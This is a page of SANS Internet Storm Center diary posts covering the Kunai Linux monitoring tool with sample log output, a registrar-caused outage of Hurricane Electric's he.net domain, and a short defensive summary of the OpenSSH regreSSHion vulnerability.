Windows iSCSI Service Denial of Service Vulnerability
%%cve:2024-35270%% No No - - Important 5.3 4.6
Xbox Wireless Adapter Remote Code Execution Vulnerability
%%cve:2024-38078%% No No - - Important 7.5 6.5

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2024-07-08

Kunai: Keep an Eye on your Linux Hosts Activity

Microsoft has a very popular tool (part of the SysInternals) called Sysmon[1]. It is a system service and device driver designed to monitor and log system activity, including very useful events like process creations, network connections, DNS requests, file changes, and more. This tool is deployed by many organizations because it’s a great companion to expand the visibility of your Windows environments. Many SOCs rely on it to perform investigations and hunting.

A while ago, Microsoft decided to port Sysmon on Linux and, logically, called it SysmonForLinux[2].  Unfortunately, the tool never gets the same attraction, for multiple reasons. First of all, the core developer left Microsoft after the first release of the tool and it definitively lacks updates and follow-up. A good way to check this is to have a look at the open issues on the GitHub repository. There was a small update a few months ago but without new exciting features. Then, Microsoft tried to reproduce Sysmon for Windows but the two operating systems do not work in the same way. Anyway, I tested SysmonForLinux[3] (and it’s still running on the server) but I don’t use it in production.

Last week, I attended « Pass The Salt », a conference focussing on open-source software and cybersecurity. I participated in a very interesting workshop about « Kunai ». This tool, developed by Quentin Jérôme from CIRCL (the Luxembourg CERT) aims to replace SysmonForLinux. Its goal is to record and log system activity but in a more «Linux-oriented» flavor. It was presented for the first time at hack.lu in 2023 and it now reaches enough maturity to be tested and deployed on some Linux hosts.

Kunai is developed in Rust and uses eBPF to interact with the kernel (compatible with all the Linux LTS kernels(from 5.4 to 6.6). eBPF programs can be attached to various hooks in the kernel, such as system calls, tracepoints, and network events, allowing them to run in response to specific events or conditions.

Kunai's core features are:

  • Single executable (really simple to deploy)
  • Events are enriched with a lot of data
  • Support for containers, namespaces
  • Filtering (to reduce the noise - this is a critical step in your deployment!)
  • Hunting (based on an IOC list)
  • JSON output to log events

To test it, just run Kunai as root:

$ sudo ./kunai | tee -a /var/log/kunai/events.log | jq .

This command will launch a Kunai that will log all events without filters. Let’s take a quick test:

$ curl https://isc.sans.edu

Curl will generate a lot of events (with the default config) but some of them are interesting.

Creation of the process:

{
  "data": {
    "ancestors": "/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/bin/bash",
    "parent_exe": "/usr/bin/bash",
    "command_line": "curl https://isc.sans.edu",
    "exe": {
      "file": "/usr/bin/curl",
      "md5": "25828b12203bb53e5f9bc54d2f8507a7",
      "sha1": "4bfe301715d6564404f6ebd56156c668329cc83b",
      "sha256": "53a2fe036f8def7b4372246ffa7835f97cdeb17268e7c8df9756f42baf28cc0f",
      "sha512": "c01c7298103bd2adaf432a807c65d2eccfbed9ce820d80424d03accdceb9c801167f65cfb93ea1b5677fdbf8235e34de061a449f03fd45d58fd913dce139aa51",
      "size": 260328
    }
  },
  "info": {
    "host": {
      "uuid": "2bb02904-9daa-5be5-adcb-5371b78c1866",
      "name": "ubuntu-vm",
      "container": null
    },
    "event": {
      "source": "kunai",
      "id": 1,
      "name": "execve",
      "uuid": "be8c77c8-ec40-959d-87af-39e19364f277",
      "batch": 161
    },
    "task": {
      "name": "curl",
      "pid": 9301,
      "tgid": 9301,
      "guuid": "09e8471d-730a-0000-c3d5-65bb55240000",
      "uid": 1000,
      "gid": 1000,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400000"
    },
    "parent_task": {
      "name": "bash",
      "pid": 9292,
      "tgid": 9292,
      "guuid": "95447ea0-6d0a-0000-c3d5-65bb4c240000",
      "uid": 1000,
      "gid": 1000,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400000"
    },
    "utc_time": "2024-07-06T05:27:19.916790817Z"
  }
}

The corresponding DNS Request:

{
  "data": {
    "ancestors": "/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/bin/bash|/usr/bin/sudo|/usr/bin/sudo|/usr/bin/bash",
    "command_line": "curl https://isc.sans.edu",
    "exe": {
      "file": "/usr/bin/curl"
    },
    "query": "isc.sans.edu",
    "proto": "udp",
    "response": "45.60.31.34;45.60.103.34",
    "dns_server": {
      "ip": "127.0.0.53",
      "port": 53,
      "public": true,
      "is_v6": false
    }
  },
  "info": {
    "host": {
      "uuid": "2bb02904-9daa-5be5-adcb-5371b78c1866",
      "name": "ubuntu-vm",
      "container": null
    },
    "event": {
      "source": "kunai",
      "id": 61,
      "name": "dns_query",
      "uuid": "5850ea54-ee1f-c38f-3dc6-294d8ae689b0",
      "batch": 3355
    },
    "task": {
      "name": "curl",
      "pid": 2350,
      "tgid": 2349,
      "guuid": "d12e76a0-7e02-0000-b116-fe882d090000",
      "uid": 0,
      "gid": 0,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400040"
    },
    "parent_task": {
      "name": "bash",
      "pid": 1709,
      "tgid": 1709,
      "guuid": "2672a103-1100-0000-b116-fe88ad060000",
      "uid": 0,
      "gid": 0,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400100"
    },
    "utc_time": "2024-07-06T05:27:19.942717828Z"
  }
}

I like the "ancestors" field that reveals the complete process tree!

One of the critical tasks to perform with Kunai is to know what you’re looking for and filter unwanted events (exactly like Sysmon). The simple curl command tested above generated 49 events! Most of them are of the type ‘mmap_exec’. This event is generated whenever the mmap[4] syscall is used to map an executable file in memory, with memory execution protection. This syscall is typically related to loading a dynamic library but it may reveal some malicious activity when malware tries to load a shellcode by example.

Logically, you can write filters to reduce the noise and get rid of these events. Here, Kunay and Sysmon work in the same way: try to reduce the noise but not too much or you increase chances of missing interesting events. 

Here is a simple filter:

$ cat filter.yaml
name: log.interesting_events
params:
    filter: true
match-on:
    events:
        kunai: [ 1,2,61 ]

The list is supported events is available in the documentation[5]. In the example above, we will record only:

  • Execve (ID 1) 
  • Execve script (reports more details about script interpreters) (ID 2)
  • Dns query (ID 61)

Now restart Kunai:

$ sudo ./kunai -r filter.yaml | tee -a /var/log/kunai/events.log | jq .

You can also hunt for specific IOCs by providing another configuration file:

$ cat simple_ioc.json
{"uuid": "435358ae-4ca0-4573-8b9f-cd725de75103", "source": “misp”, "value": “8.8.8.8”}

“Value” can be a hash, a path, an IP or a domain/FQDN.

$ sudo ./kunai -I simple_ioc.json | tee -a /var/log/kunai/events.log | jq .

To generate a list of interesting IOCs, there is an integration available with a tool that extracts data from your MISP instance and generates a file compatible with Kunai:

$ ./misp-to-kunai.py -h
usage: misp-to-kunai.py [-h] [-c CONFIG] [-s] [-l LAST] [-o OUTPUT] [--overwrite] [--all] [--tags TAGS] [--wait WAIT] [--service]

Tool pulling IoCs from a MISP instance and converting them to be loadable in Kunai

options:
  -h, --help            show this help message and exit
  -c CONFIG, --config CONFIG
                        Configuration file. Default: /opt/workshops/tools/misp/config.toml
  -s, --silent          Silent HTTPS warnings
  -l LAST, --last LAST  Process events updated the last days
  -o OUTPUT, --output OUTPUT
                        Output file
  --overwrite           Overwrite output file (default is to append)
  --all                 Process all events, published and unpublished. By default only published events are processed.
  --tags TAGS           Comma separated list of (event tags) to pull iocs for
  --wait WAIT           Wait time in seconds between to runs in service mode
  --service             Run in service mode (i.e endless loop)

Kunai still must be improved. During the workshop, we had great exchanges with the developer and gave some ideas. For example, there is a lack of integration with the system: No automatic log management (like rotation), you need to write your own systemd integration to start/stop it automatically.

I'm testing the tool on some hosts and processing JSON data in my Splunk instance. It provides great visibility for Linux systems! Worth mentioning, that the impact on system performance remains acceptable (but it will directly be related to the logging policy that you'll use).

[1] https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
[2] https://github.com/Sysinternals/SysmonForLinux
[3] https://isc.sans.edu/diary/Whos+Resolving+This+Domain/29462
[4] https://man7.org/linux/man-pages/man2/mmap.2.html
[5] https://why.kunai.rocks/docs/category/kunai---events

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2024-07-05

Overlooked Domain Name Resiliency Issues: Registrar Communications

I often think the Internet would work better without DNS. People unable to remember an IP address would be unable to use it. But on the other hand, there is more to DNS than translating a human-readable hostname to a "machine-readable" IP address. DNS does allow us to use consistent labels even as the IP address changes.

Many critical resources are only referred to by hostname, not by IP address. This does include part of the DNS infrastructure itself. NS records point to hostnames, not IP addresses, and we use glue records (A records, actually) to resolve them. Organizations typically rely on multiple authoritative name servers that automatically replicate updates between them to provide resiliency for DNS. This process is typically quite reliant, and cloud providers offer additional services to ensure data availability. Anycast name servers can provide additional resilience to this setup.

However, there is a weak point in this setup: Registrars. Yesterday, Hurricane Electric, a significant internet transit provider, experienced this problem [1]. 

As an internet transit provider, Hurricane Electric relies on BGP (Border Gateway Protocol) to route traffic to and from its customers. The associate routers are identified with hostnames like "ns1-ns5.he.net". However, yesterday the name resolution for he.net failed. It probably didn't help that this happened on a major holiday in the US.

The domain "he.net" is hosted with Network Solutions. Network Solutions is one of the "original" domain registrars but has been going through the usual acquisitions and mergers. They currently appear to be owned by Newfold, a company that happens to be located in Jacksonville, FL, where I happen to reside, too.

Yesterday, he.net stopped resolving. The technical issue was that the he.net domain was removed from the .net zone. Without any nameservers being returned by .net nameservers, clients could not resolve he.net names. The registrar is responsible for maintaining this information. Registrars are "special" because they have the contracts in place to update these top-level domains with whoever maintains them. Whois can be used to identify these relationships. For he.net, the whois record returned [2]: 

   Domain Name: HE.NET
   Registry Domain ID: 486609_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.networksolutions.com
   Registrar URL: http://networksolutions.com
   Updated Date: 2024-07-04T15:06:46Z
   Creation Date: 1995-07-31T04:00:00Z
   Registry Expiry Date: 2033-07-30T04:00:00Z
   Registrar: Network Solutions, LLC
   Registrar IANA ID: 2
   Registrar Abuse Contact Email: domain.operations at web.com
   Registrar Abuse Contact Phone: +1.8777228662
   Domain Status: clientHold https://icann.org/epp#clientHold
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

I highlighted the important line in red: The domain is marked as "clientHold". According to ICANN, this means:

This status code tells your domain's registry to not activate your domain in the DNS and as a consequence, it will not resolve. It is an uncommon status that is usually enacted during legal disputes, non-payment, or when your domain is subject to deletion. 

Often, this status indicates an issue with your domain that needs resolution. If so, you should contact your registrar to resolve the issue. If your domain does not have any issues, but you need it to resolve, you must first contact your registrar and request that they remove this status code.

According to Hurricane Electric, someone maliciously or accidentally reported a page at he.net for phishing. Network Solutions, in return, set the "client hold" status, which effectively removed he.net from DNS. The issue was amplified by Network Solution not offering a simple customer support channel to resolve the issue. It took several hours to resolve, leading to routing issues for he.net customers.

Sadly, I don't think there is a "simple" solution for this issue. Of course, you should select a reliable registrar with reasonable customer support offerings. But I am not sure one exists. Network Solutions is offering competitive pricing but is not the cheapest domain registrar. For convenience, I do like to keep all my domains with one registrar. But this may backfire if you have a dispute with that one registrar.

Using different domains for different purposes can also help. This way, if one of your domains is having issues, you can still use the other domain to communicate.

And communication goes both ways. Just as you must be able to reach your registrar, your registrar must be able to reach you to resolve issues. It is unclear if Network Solutions attempted to reach out to Hurricane Electric after Network Solutions received the phishing complaint. It can also be counterproductive to use privacy features for business domains. Offering valid contact information in Whois may help someone report an issue to you directly versus going through a registrar first. Of course, this will not help if the report is meant to be malicious.

The Hurricane Electic incident is still very fresh, and we may not yet know all the details, but keep an eye out for any post mortems with more details from either Hurricane Electric or Network Solutions.

[1] https://x.com/henet/status/1808953880404787288
[2] https://puck.nether.net/pipermail/outages/2024-July/015214.html

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2024-07-01

SSH "regreSSHion" Remote Code Execution Vulnerability in OpenSSH.

Qualys published a blog posts with details regarding a critical remote code execution vulnerability [1]

This week is far from ideal to have to deal with a critical vulnerability in widely used software like OpenSSH. So I want to save you some time by summarizing the most important points in a very brief post:

  • The CVEs associated with this vulnerability are CVE-2006-5051 and CVE-2024-6387,
  • The reason for the two CVE numbers and the use of the old 2006 CVE number is that this is a regression. An old vulnerability that came back. Sadly, this happens somewhat regularly (not with OpenSSH, but software in general) if developers do not add tests to ensure the vulnerability is patched in future versions. Missing comments are another reason for these regressions. A developer may remove a test they consider unnecessary. 
  • The vulnerability does allow arbitrary remote code execution without authentication.
  • OpenSSH versions up to 4.4p1 are vulnerable to CVE-2006-5051
  • OpenSSH versions from 8.5p1 to 9.8p1 (this is the version patched version)
  • Remember that many Linux distributions will not increase version numbers if they are backporting a patch
  • This is a timing issue, and exploitation is not easily reproducible but takes about 10,000 attempts on x86 (32-bit).
  • This speed of exploitation is limited by the MaxStartups and LoginGraceTime.
  • Exploitation for AMD64 appears to be not practical at this time.

Most Linux systems are currently running on 64-bit architectures. However, this could be a big deal for legacy systems / IoT systems in particular if no more patches are available. Limiting the rate of new connections using a network firewall may make exploitation less likely in these cases. First of all, a patch should be applied. But if no patch is available, port knocking, moving the server to an odd port or allowlisting specific IPs may be an option.

 

[1] https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments